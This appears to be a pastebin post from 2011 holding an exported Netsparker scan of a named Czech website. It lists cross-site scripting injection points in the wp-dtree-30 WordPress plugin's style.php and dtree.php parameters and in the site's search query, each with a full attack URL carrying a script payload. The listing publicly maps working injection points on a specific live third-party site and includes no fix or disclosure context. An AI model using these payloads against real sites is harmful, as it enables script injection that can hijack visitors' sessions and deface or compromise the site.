sroub3k

bazen-trebova.cz

Aug 18th, 2011
  1. * [Possible] Cross-site Scripting
  2.  
  3. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  4.  
  5. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize='"--></style></script><script>alert(0x000154)</script>&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  6.  
  7. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  8. Parameter Name: fontsize
  9. Parameter Type: Querystring
  10. Attack Pattern: '"--></style></script><script>netsparker(0x000154)</script>
  11. ...
  12. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf='"--></style></script><script>alert(0x000182)</script>&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  13.  
  14. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  15. Parameter Name: fontf
  16. Parameter Type: Querystring
  17. Attack Pattern: '"--></style></script><script>netsparker(0x000182)</script>
  18. ...
  19. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor='"--></style></script><script>alert(0x0001B2)</script>&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  20.  
  21. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  22. Parameter Name: sfontdecor
  23. Parameter Type: Querystring
  24. Attack Pattern: '"--></style></script><script>netsparker(0x0001B2)</script>
  25. ...
  26. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor='"--></style></script><script>alert(0x000208)</script>&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  27.  
  28. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  29. Parameter Name: mfontcolor
  30. Parameter Type: Querystring
  31. Attack Pattern: '"--></style></script><script>netsparker(0x000208)</script>
  32. ...
  33. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor='"--></style></script><script>alert(0x000257)</script>&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  34.  
  35. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  36. Parameter Name: lfontcolor
  37. Parameter Type: Querystring
  38. Attack Pattern: '"--></style></script><script>netsparker(0x000257)</script>
  39. ...
  40. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor='"--></style></script><script>alert(0x000288)</script>&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  41.  
  42. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  43. Parameter Name: lfontdecor
  44. Parameter Type: Querystring
  45. Attack Pattern: '"--></style></script><script>netsparker(0x000288)</script>
  46. ...
  47. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor='"--></style></script><script>alert(0x0002B4)</script>&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  48.  
  49. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  50. Parameter Name: hfontcolor
  51. Parameter Type: Querystring
  52. Attack Pattern: '"--></style></script><script>netsparker(0x0002B4)</script>
  53. ...
  54. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor='"--></style></script><script>alert(0x0002D1)</script>&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  55.  
  56. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  57. Parameter Name: hfontdecor
  58. Parameter Type: Querystring
  59. Attack Pattern: '"--></style></script><script>netsparker(0x0002D1)</script>
  60. ...
  61. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx='"--></style></script><script>alert(0x0002F7)</script>&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  62.  
  63. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  64. Parameter Name: rssgfx
  65. Parameter Type: Querystring
  66. Attack Pattern: '"--></style></script><script>netsparker(0x0002F7)</script>
  67. ...
  68. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh='"--></style></script><script>alert(0x000317)</script>
  69.  
  70. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  71. Parameter Name: rssgfxh
  72. Parameter Type: Querystring
  73. Attack Pattern: '"--></style></script><script>netsparker(0x000317)</script>
  74.  
  75.  
  76. * Cross-site Scripting
  77.  
  78. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  79.  
  80. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree.php?witheff=1&eff=blind&effdur='"--></style></script><script>alert(0x0001AA)</script>
  81. Parameter Name: effdur
  82. Parameter Type: Querystring
  83. Attack Pattern: '"--></style></script><script>alert(0x0001AA)</script>
  84. ...
  85. http://www.bazen-trebova.cz/?s='"--></style></script><script>alert(0x000248)</script>
  86. Parameter Name: s
  87. Parameter Type: Querystring
  88. Attack Pattern: '"--></style></script><script>alert(0x000248)</script>
  89. ...
  90. http://www.bazen-trebova.cz/?"><script>alert(9)</script>
  91. Parameter Name: Query Based
  92. Parameter Type: FullQueryString
  93. Attack Pattern: "><script>alert(9)</script>
  94. ...